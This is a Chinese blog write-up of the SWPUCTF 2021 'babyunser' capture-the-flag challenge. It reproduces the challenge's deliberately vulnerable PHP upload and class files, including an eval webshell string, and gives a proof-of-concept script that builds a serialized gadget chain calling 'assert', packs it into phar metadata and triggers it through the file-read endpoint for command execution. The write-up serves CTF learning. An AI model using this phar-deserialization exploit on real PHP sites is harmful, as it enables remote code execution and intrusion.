[SWPUCTF 2021 新生赛]babyunser

[SWPUCTF 2021 新生赛]babyunser

尝试上传,自动解析成txt文件

文件查看可以查到源码

read.php

<?php
error_reporting(0);
$filename=$_POST['file'];
if(!isset($filename)){
    die();
}
$file=new zz($filename);
$contents=$file->getFile();
?>

upload.php

<?php
    if(isset($_POST['submit'])){
        $upload_path="upload/".md5(time()).".txt";
        $temp_file = $_FILES['upload_file']['tmp_name'];
        if (move_uploaded_file($temp_file, $upload_path)) {
            echo "文件路径:".$upload_path;
        } else {
            $msg = '上传失败';
        }
    }

class.php

<?php
class aa{
    public $name;
 
    public function __construct(){
        $this->name='aa';
    }
 
    public function __destruct(){
        $this->name=strtolower($this->name);
    }
}
 
class ff{
    private $content;
    public $func;
 
    public function __construct(){
        $this->content="\<?php @eval(\$_POST[1]);?>";
    }
 
    public function __get($key){
        $this->$key->{$this->func}($_POST['cmd']);
    }
}
 
class zz{
    public $filename;
    public $content='surprise';
 
    public function __construct($filename){
        $this->filename=$filename;
    }
 
    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }
 
    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        //此功能废弃,不想写了
    }
 
    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }
 
    public function __toString(){
        $this->{$_POST['method']}($_POST['var']);
        return $this->content;
    }
}
 
class xx{
    public $name;
    public $arg;
 
    public function __construct(){
        $this->name='eval';
        $this->arg='phpinfo();';
    }
 
    public function __call($name,$arg){
        $name($arg[0]);
    }
}

顺着魔术方法构造

poc

<?php
class aa{
    public $name;
    function __construct(){
        $this->name = new zz();
    }
}
 
class ff{
    private $content;
    public $func = "assert";
    function __construct(){
        $this->content = new xx();
    }
}
 
class zz{
    public $filename;
    public $content='surprise';
    function __construct(){
        $this->filename = new ff();
    }
 
}
 
class xx{
    public $name;
    public $arg;
}
 
$a = new aa();
echo urlencode(serialize($a));
 
# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
 
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

生成phar文件 上传进去

然后在read.php 这里post

posted @ 2023-06-08 16:11  Magic水瓶  阅读(258)  评论(0)    收藏  举报